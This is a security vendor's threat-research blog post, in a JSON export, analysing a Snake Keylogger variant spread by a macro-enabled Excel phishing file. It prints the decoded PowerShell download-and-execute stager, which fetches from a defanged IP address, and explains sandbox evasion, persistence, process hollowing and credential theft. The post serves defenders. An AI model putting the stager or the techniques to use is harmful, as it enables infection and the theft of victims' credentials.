{"id":17983,"date":"2022-02-02T10:17:26","date_gmt":"2022-02-02T18:17:26","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2022\/02\/02\/news-11716\/"},"modified":"2022-02-02T10:17:26","modified_gmt":"2022-02-02T18:17:26","slug":"news-11716","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/02\/02\/news-11716\/","title":{"rendered":"Deep Dive into a Fresh Variant of Snake Keylogger Malware"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\"><\/div>\n<\/p><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><b><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs.html?utm_source=blog&amp;utm_medium=campaign&amp;utm_campaign=FortiGuardLabs\">FortiGuard Labs<\/a>\u00a0Threat\u00a0Research Report<\/b><\/p>\n<p><b>Affected platforms:<\/b>\u00a0\u00a0\u00a0\u00a0Microsoft Windows<br \/> <b>Impacted parties:<\/b>\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0Windows Users<br \/> <b>Impact:<\/b>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Collects sensitive information from victims\u2019 device<br \/> <b>Severity level<\/b><span>: \u00a0 \u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Critical<\/span><\/p>\n<p><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?utm_source=blog&amp;utm_campaign=fortiguardlabs\">Fortinet\u2019s FortiGuard Labs<\/a> recently captured a Microsoft Excel sample from the wild that was used to spread <a href=\"https:\/\/www.fortinet.com\/resources\/cyberglossary\/malware?utm_source=blog&amp;utm_campaign=malware\">malware<\/a>. 
After researching its behaviors, I recognized it as a fresh variant of the Snake <a href=\"https:\/\/www.fortinet.com\/resources\/cyberglossary\/what-is-keyloggers.html%20?utm_source=blog&amp;utm_campaign=keylogger\">Keylogger<\/a> malware.<\/p>\n<p>Snake Keylogger is malware developed in .NET. It first appeared in late 2020 and focuses on stealing sensitive information from a victim\u2019s device, including saved credentials, the victim\u2019s keystrokes, screenshots of the victim\u2019s screen, and clipboard data.\u00a0<\/p>\n<p>In July 2021, Snake Keylogger entered a top 10 report of popular malware families for the first time, meaning that the family is extending its reach and impacting more people\u2019s devices and sensitive data.<\/p>\n<p>In this threat research blog you will learn how the Snake Keylogger variant is downloaded and executed through a captured Excel sample, what techniques this variant uses to protect itself from being analyzed, what sensitive information it steals from a victim\u2019s machine, and how it submits the collected data to the attacker.\u00a0<\/p>\n<p>Here we go.<\/p>\n<h2>What the\u00a0Captured Microsoft Excel Sample Looks\u00a0Like<\/h2>\n<p>This Excel sample, delivered as an attachment in a phishing email, contains malicious macro VBA code. Figure 1.1 shows a screenshot of the file when it is opened. 
It displays a blurred picture of a document and asks the victim to click the yellow button to get a clearer image.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image.img.png\/1635971358250\/picture1.png\" alt=\"Figure 1.1 \u2013 The Excel file content when it is opened\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 1.1 \u2013 The Excel file content when it is opened<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Once the victim clicks the yellow \u201cEnable Content\u201d button, the malicious VBA code is executed in the background. The macro project that contains the malicious VBA code is password protected so that it cannot be viewed by an analyst. However, we were able to modify its binary file to remove this restriction.<\/p>\n<p>Going through its code, we see that a \u201cWorkbook_Activate()\u201d method is called automatically when the document is opened. It writes a piece of <a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/offense-and-defense-a-tale-of-two-sides-powershell?utm_source=blog&amp;utm_campaign=offense-and-defense-a-tale-of-two-sides-powershell\">PowerShell<\/a> code from a local variable into a BAT file. 
Figure 1.2 shows part of the VBA code of this method, where the variable \u201cs\u201d holds the PowerShell code and &quot;Gqyztfbtsogpnruooqr.bat&quot; is the BAT file, which is finally executed by the call \u201cx = Shell(bat, 0)\u201d.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_205518390.img.png\/1635971390509\/picture2.png\" alt=\"Figure 1.2 \u2013 Macro VBA code executed in background\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 1.2 \u2013 Macro VBA code executed in background<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The bottom of Figure 1.2 shows the content of the variable \u201cs\u201d, which contains the base64-encoded PowerShell code that PowerShell.exe decodes when it is executed.\u00a0<\/p>\n<p>Below is the base64-decoded PowerShell code:<\/p>\n<p style=\"margin-left: 40.0px;\">$ProcName = &quot;Wheahmnfpgaqse.exe&quot;;<br \/> (New-Object System.Net.WebClient).<b>DownloadFile<\/b><span>(&quot;hxxp[:]\/\/3[.]64[.]251[.]139\/v3\/2\/Requests07520000652.exe&quot;,&quot;$env:APPDATA\\$ProcName&quot;);<br \/> <\/span><b>Start-Process<\/b><span>\u00a0(&quot;$env:APPDATA\\$ProcName&quot;)<\/span><\/p>\n<p>The PowerShell code is very simple and easy to understand. 
It downloads a file (\u201cRequests07520000652.exe\u201d) onto the victim\u2019s device, saves it as \u201c%AppData%\\Wheahmnfpgaqse.exe\u201d by calling \u201cDownloadFile()\u201d, and executes it by calling \u201cStart-Process()\u201d.<\/p>\n<h2>Snake Keylogger Downloader<\/h2>\n<p>After some research, I learned that the file\u00a0&quot;Wheahmnfpgaqse.exe&quot;\u00a0is a downloader of Snake Keylogger, written as a .Net program. When it starts, it sleeps for 21 seconds to evade sandboxes that kill a sample process when a no-activity timeout is triggered.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_2090882926.img.png\/1635971495247\/picture3.png\" alt=\"Figure 2.1 \u2013 Downloads &amp; decrypts Snake Keylogger module after a sleep\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 2.1 \u2013 Downloads &amp; decrypts Snake Keylogger module after a sleep<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Twenty-one seconds later, the downloader invokes a function called \u201cConsturctor()\u201d, as you can see in Figure 2.1. This in turn invokes another function, \u201cProgram.List_Types()\u201d, which downloads the Snake Keylogger module from the link \u201chxxps[:]\/\/store2[.]gofile[.]io\/download\/0283e6ba-afc6-4dcb-b2f4-3173d666e2c4\/Huzeigtmvaplpinhoo.dll\u201d, an RC4-encrypted DLL file. 
Next, it calls the \u201cToRc()\u201d function to RC4-decrypt it using the decryption key &quot;Dllzjn&quot;.<\/p>\n<p>It then loads the decrypted DLL module (a .Net DLL file called \u201cHuzeigtmvaplpinhoo.dll\u201d) and enumerates its exported functions to find &quot;G6doICqoMU()&quot;, which is invoked by executing \u201ctype.InvokeMember(&quot;G6doICqoMU&quot;, BindingFlags.InvokeMethod, null, null, null)\u201d in the function Consturctor(), as shown in Figure 2.1. The decrypted .Net DLL is the dropper and installer of Snake Keylogger.\u00a0<\/p>\n<p>Let\u2019s dive into this module to see how it performs its tasks.<\/p>\n<h2>Snake Keylogger Installer<\/h2>\n<p>According to my analysis, the decrypted DLL module (\u201cHuzeigtmvaplpinhoo.dll\u201d) deploys Snake Keylogger onto the victim\u2019s device and sets it up as an auto-run program. It extracts an executable PE file into memory from its Resource directory and then performs process hollowing, injecting the PE file into a newly created child process and executing it there.\u00a0<\/p>\n<p>In this section I will explain in detail how it performs these functions.<\/p>\n<p style=\"margin-left: 40.0px;\"><b style=\"\">1. 
Persistence Mechanism\u00a0<\/b><\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_792355966.img.png\/1635971618952\/picture4.png\" alt=\"Figure 3.1 \u2013 Breaks on the export function \u201cG6doICqoMU()\u201d in the debugger dnSpy\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 3.1 \u2013 Breaks on the export function \u201cG6doICqoMU()\u201d in the debugger dnSpy<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 3.1 shows an outline of the decrypted DLL module (\u201cHuzeigtmvaplpinhoo.dll\u201d). As you can see, to hinder analysis the file is obfuscated so that the class names, function names, and variable names are all randomly generated, meaningless strings. This creates extra work for analysts.\u00a0<\/p>\n<p>The full name of the export function \u201cG6doICqoMU()\u201d is \u201cHuzeigtmvaplpinhoo!pXfqpio3clcAoFxTnfJ.CORFgLoyRGlurYwdwIh.G6doICqoMU()\u201d. Again, for the same reason as before, it sleeps for 35 seconds at the beginning of this function to bypass some malware analysis systems.<\/p>\n<p>Next, it works to make Snake Keylogger persistent on the infected Windows system. As we all know, a Windows system has a \u201cStartup\u201d folder inside the \u201cStart Menu\u201d. The programs inside this folder are started when Windows starts. 
The full path to this folder is defined in the system registry by the string value \u201cStartup\u201d under the keys \u201cHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\u201d and \u201cHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\u201d. The value data of \u201cStartup\u201d is \u201cC:\\Users\\{UserName}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\u201d by default.\u00a0<\/p>\n<p>This variant of Snake Keylogger changes both \u201cStartup\u201d values to point at another folder. Figure 3.2 shows the code changing the Windows startup folder to \u201cC:\\Users\\M0YTes0Env\\AppData\\Roaming\\Microsoft\\Windows\\Start\u00a0Menu\\Programs\\chsg\u201d by calling the API SetValue(). In the bottom half of Figure 3.2 you can see the system registry path, the value name, and the new value data.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_2067856085.img.png\/1635971652447\/picture5.png\" alt=\"Figure 3.2 \u2013 Change Windows \u201cStartup\u201d folder to a new path\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 3.2 \u2013 Change Windows \u201cStartup\u201d folder to a new path<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>\u201cchsg\u201d is a new folder created by Snake Keylogger. The program copies the Snake Keylogger file (the downloaded\u00a0&quot;Wheahmnfpgaqse.exe&quot;) into this folder and renames it \u201csgosr.exe\u201d. 
This ensures that the Windows system starts Snake Keylogger every time it boots.<\/p>\n<p style=\"margin-left: 40.0px;\"><b>2. Extraction from Resource\u00a0<\/b><\/p>\n<p>Although the content of\u00a0Huzeigtmvaplpinhoo.dll only ever appears in memory, I saved it to a local file to analyze it. It has several resources in its Resource directory, as shown below in Figure 3.3.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_971564952.img.png\/1635971716946\/picture6.png\" alt=\"Figure 3.3 \u2013 Resource directory display of Huzeigtmvaplpinhoo.dll\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 3.3 \u2013 Resource directory display of Huzeigtmvaplpinhoo.dll<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The process of extracting the Snake Keylogger payload file is a little complicated, because it uses a tricky way to load the resource. It has a local callback function, defined as a ResolveEventHandler, that is registered to AppDomain.ResourceResolve; this callback is called whenever loading a resource by name fails, much like an exception handler in the Windows SEH mechanism. 
In addition, it has another local callback function registered to AppDomain.AssemblyResolve, which is called when loading an assembly (such as a module) by name fails.<\/p>\n<p>Below is pseudocode for registering the local resource resolver, where T9wOjU5ccxTJaVfUntn.Osc50oil0l is the local callback function.<\/p>\n<p style=\"margin-left: 40.0px;\"><i>AppDomain.ResourceResolve\u00a0+=\u00a0new\u00a0ResolveEventHandler(T9wOjU5ccxTJaVfUntn.Osc50oil0l)<\/i><\/p>\n<p>Now, let\u2019s see how Snake Keylogger puts this to use: it deliberately loads a nonexistent resource, which triggers the resource loading failure. It tries to read a resource named &quot;Qkxkikeg&quot; from the current module, which has no resource of that name in its Resource directory, as you can see in Figure 3.3. A resource loading failure occurs, and the registered ResolveEventHandler function is called to handle the error. This in turn causes an assembly loading failure, and the assembly resolve callback function is called.<\/p>\n<p>A short while later, another PE file, decrypted from the resource \u201c{d977ee8c-85ce-4731-b9a1-323ba88c6eeb}\u201d, appears in memory. 
It contains a resource named \u201cQkxkikeg\u201d, the originally requested resource name, as shown in Figure 3.4.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_1085725967.img.png\/1635971801659\/picture7.png\" alt=\"Figure 3.4 \u2013 \u201cQkxkikeg\u201d resource is in another module\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 3.4 \u2013 \u201cQkxkikeg\u201d resource is in another module<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The Snake Keylogger payload is simply GZIP-compressed data stored in the resource \u201cQkxkikeg\u201d under the Resource directory \u201cClassLibrary1.Properties.Resources\u201d.<\/p>\n<p>Figure 3.5 displays the GZIP data of the resource \u201cQkxkikeg\u201d (reversed) on the left and the decompressed Snake Keylogger on the right.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_463161130.img.png\/1635971830008\/picture8.png\" alt=\"Figure 3.5 \u2013 Compressed and decompressed data of \u201cQkxkikeg\u201d\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 3.5 \u2013 Compressed and decompressed data of \u201cQkxkikeg\u201d<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p style=\"margin-left: 40.0px;\"><b>3. Process Hollowing<\/b><\/p>\n<p>The program then creates a suspended child process and deploys the Snake Keylogger payload into it. It then resumes the child process. Meanwhile, the parent process exits by calling Environment.Exit(0).<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_1455412994.img.png\/1635971860106\/picture9.png\" alt=\"Figure 3.6 \u2013 Create a suspended child process\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 3.6 \u2013 Create a suspended child process<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>According to the code in Figure 3.6, it calls the API CreateProcess() to create the child process with the creation flags 134217732U (0x8000004), which means\u00a0CREATE_NO_WINDOW and CREATE_SUSPENDED.<\/p>\n<p>It then calls the API WriteProcessMemory() to copy the Snake Keylogger payload into the child process, section by section. It next calls SetThreadContext() to point the child process\u2019s main thread at the entry point function of Snake Keylogger. 
Before the parent process exits, the API ResumeThread() is called so that the child process resumes execution.<\/p>\n<h2>Snake Keylogger Payload<\/h2>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_638198016.img.png\/1635971901819\/picture10.png\" alt=\"Figure 4.1 \u2013 Fully obfuscated Snake Keylogger payload\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 4.1 \u2013 Fully obfuscated Snake Keylogger payload<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The code of the Snake Keylogger payload file is fully obfuscated, as shown in Figure 4.1, to protect it from being analyzed. The class and function names are unreadable.<\/p>\n<p>Therefore, to better analyze and explain its code and intent, I deobfuscated the payload file using the tool \u201cde4dot\u201d. This made its code more readable, and my analysis is based on that result.<\/p>\n<p>Going through the Snake Keylogger code, I realized that it provides features such as recording a victim\u2019s keystrokes (the keylogger), taking screenshots of the victim\u2019s screen, stealing data from the system clipboard, and stealing saved credentials for specific software clients installed on the victim\u2019s device.<\/p>\n<p style=\"margin-left: 40.0px;\"><b>1. 
Keylogger Feature<\/b><\/p>\n<p>Figure 4.2 shows a code snippet that sets up the keylogger.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_1969115062.img.png\/1635971977004\/picture11.png\" alt=\"Figure 4.2 \u2013 Initialization of Keylogger\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 4.2 \u2013 Initialization of Keylogger<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>It calls the API SetWindowsHookExA() to register a hook callback function (this.callback_ProcessKey()) that monitors low-level keyboard input events. The first parameter is the hook type, where \u201c13\u201d indicates WH_KEYBOARD_LL.<\/p>\n<p>After that, the callback function is called by the Windows system whenever the victim types, so it can handle the keystrokes and record them into a global string variable. It also records the foreground window title, to identify where the victim is typing, by calling the <a href=\"https:\/\/www.fortinet.com\/resources\/cyberglossary\/api-security?utm_source=blog&amp;utm_campaign=api-security\">APIs<\/a> GetForegroundWindow() and GetWindowText().<\/p>\n<p>It also has a Timer (Timer0) that periodically sends the logged keystrokes to the attacker.<\/p>\n<p style=\"margin-left: 40.0px;\"><b>2.\u00a0Screenshot<\/b><\/p>\n<p>It is able to take screenshots of the victim\u2019s screen. It has a Timer (Timer1) that captures screenshots from time to time by calling the API CopyFromScreen(). It saves each screenshot to a local Screenshot.png file in the system\u2019s \u201cMyDocuments\u201d folder. 
It also sends this picture file to the attacker.<\/p>\n<p style=\"margin-left: 40.0px;\"><b>3.\u00a0System Clipboard\u00a0<\/b><\/p>\n<p>It has two Timers. One (Timer2) is used to collect system clipboard data by calling Clipboard.GetText() and saves it to a global variable. The other (Timer3) is used to send the collected clipboard data to the attacker.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_1063306164.img.png\/1635972073656\/picture12.png\" alt=\"Figure 4.3 \u2013 Timer function to obtain system clipboard data\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 4.3 \u2013 Timer function to obtain system clipboard data<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 4.3 shows the Timer function used to obtain system clipboard data. Every time it fires, it checks whether the current clipboard data has already been collected in the global variable main_cls.string_clipboard_data. If not, it appends the current clipboard data to that variable.<\/p>\n<p style=\"margin-left: 40.0px;\"><b>4. Steal Credentials<\/b><\/p>\n<p>Based on my analysis, this variant\u2019s main job is to steal credentials from the victim\u2019s device. 
It implements credential stealing in the Main() function, as shown in Figure 4.4 below.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_144204442.img.png\/1635972136497\/picture13.png\" alt=\"Figure 4.4 \u2013 Main() with functions to steal credentials and submit them\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 4.4 \u2013 Main() with functions to steal credentials and submit them<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>This is the deobfuscated Main() function, showing the functions used to steal credentials from various clients. The function at the bottom submits the stolen credentials. These functions obtain the saved credentials of each client from wherever that client stores them, including local files (as Chrome does) and the system registry (as Outlook does).<\/p>\n<p>I will now use Outlook as an example to explain how Snake Keylogger collects credentials.<\/p>\n<p>Figure 4.5 is a screenshot of the function that reads the credentials of Microsoft Outlook from the system registry. 
It goes through four registry paths for different Outlook versions to read out (if applicable) \u201cEmail\u201d and &quot;IMAP Password&quot; or &quot;POP3 Password&quot; or &quot;HTTP Password&quot; or &quot;SMTP Password&quot; and \u201cSMTP Server\u201d.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_426622320.img.png\/1635972175229\/picture14.png\" alt=\"Figure 4.5 \u2013 Function to collect saved credentials for Microsoft Outlook\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4.5 \u2013 Function to collect saved credentials for Microsoft Outlook<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Below is an example showing what credentials information Snake Keylogger can collect from Microsoft Outlook:<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><strong><span style=\"font-size: 12pt; font-family: 'Courier New'; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">&#8212;&#8212;&#8211; Snake Keylogger &#8212;&#8212;&#8211;<\/span><\/strong><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: 
start;\"><strong><span style=\"font-size: 12pt; font-family: 'Courier New'; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">Found From: Outlook<\/span><\/strong><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><strong><span style=\"font-size: 12pt; font-family: 'Courier New'; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">URL: smtp.gmail.com<\/span><\/strong><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><strong><span style=\"font-size: 12pt; font-family: 'Courier New'; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">E-Mail: victim_email@gmail.com<\/span><\/strong><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><strong><span style=\"font-size: 12pt; font-family: 'Courier New'; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">PSWD: {Password}<\/span><\/strong><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><strong><span style=\"font-size: 12pt; font-family: 'Courier New'; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial 
initial;\">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/span><\/strong><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>I have categorized the clients that Snake Keylogger targets as follows:<\/p>\n<p><b>Web Browsers:<\/b><\/p>\n<p>Google Chrome, Mozilla Firefox, Mozilla SeaMonkey Browser, Mozilla IceCat Browser, Yandex Browser, Microsoft Edge, Amigo Browser, Nichrome Browser, QQBrowser, Coccoc Browser, Orbitum Browser, Slimjet Browser, Iridium Browser, Vivaldi Browser, Iron Browser, Ghost Browser, Cent Browser, Xvast Browser, Chedot Browser, SuperBird Browser, 360 Browser, 360 Secure Browser, Comodo Dragon Browser, Brave-Browser, Torch Browser, UC Browser, Blisk Browser, Epic Privacy Browser, Opera Web Browser, Liebao Browser, Avast Browser, Kinza Browser, BlackHawk Browser, Citrio Browser, Uran Browser, Coowon Browser, 7 Star Browser, QIP Surf Browser, Sleipnir Browser, Chrome Canary Browser, CoolNovo Browser, SalamWeb Browser, Sputnik Browser Extension, Falkon Browser, Elements Browser, Slim Browser, Ice Dragon Browser, CyberFox Browser, PaleMoon Browser, Waterfox Browser, Kometa Browser, and various other browsers based on the Chromium project.<\/p>\n<p><b style=\"\">Email Clients:<\/b> <\/p>\n<p>Microsoft Outlook, Tencent Foxmail, Mozilla Thunderbird and Postbox.<\/p>\n<p><b>Other Clients:<\/b><\/p>\n<p>FileZilla, Pidgin and Discord.<\/p>\n<h2>Sending the Stolen Data to the Attacker<\/h2>\n<p>Per the code of this variant of Snake Keylogger, it sends an email to the attacker (using the SMTP protocol) to submit the victim\u2019s stolen credentials.\u00a0<\/p>\n<p>Snake Keylogger also collects basic information about the victim\u2019s Windows system, such as the user name, PC name, system date and time, public IP address, and country, which it puts in the header of the collected credentials.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn 
